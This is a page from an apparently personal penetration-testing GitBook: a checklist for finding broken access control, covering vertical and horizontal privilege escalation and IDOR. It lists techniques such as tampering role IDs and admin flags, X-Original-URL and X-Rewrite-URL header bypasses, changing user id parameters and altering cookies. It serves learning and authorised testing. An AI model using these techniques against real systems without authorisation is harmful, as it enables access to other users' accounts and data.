Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  • Vertical Privilege Escalation
  • Horizontal Privilege Escalation
  • IDOR
  1. Checklists

Broken Access Control

PRACTICE ! PRACTICE ! PRACTICE !

Vertical Privilege Escalation

  • Check for /admin , /robots.txt for any disallows.

  • Check Page's Source and JS files for some hidden endpoints.

  • Login as a user [Enable Response Interception] and check for admin=true.

  • Check for any changes/updation [POST], and tamper any roleid's in the JSON Context.

  • Check for URL-Based access control [X-Original-URL: /admin] | [X-Rewrite-URL: /admin].

  • If anything redirects to anything, especially with a user name check ["/username?id=akash" to "id=administrator" or "/username?id=carlos"].

Horizontal Privilege Escalation

  • If an other username is known - tamper the URL by his name

  • If the application gives unpredictable user id then search for the other user id crawling through application/source code and find thier user id, tamper it { ?id= }

  • While tampering the user in our URL and if its redirects to login or any page - Mandatory to check the response body of that redirect URL

IDOR

  • Login as a normal user and explore various tabs, If we could download something try noticing the GET request and try to tamper it to get any passwords.

  • Have admin access? Try tampering the cookies

  • Can download or read a sequential order of messages, try to access the first number of that order.

PreviousBuffer OverflowNextLocal File Inclusion

Last updated 2 years ago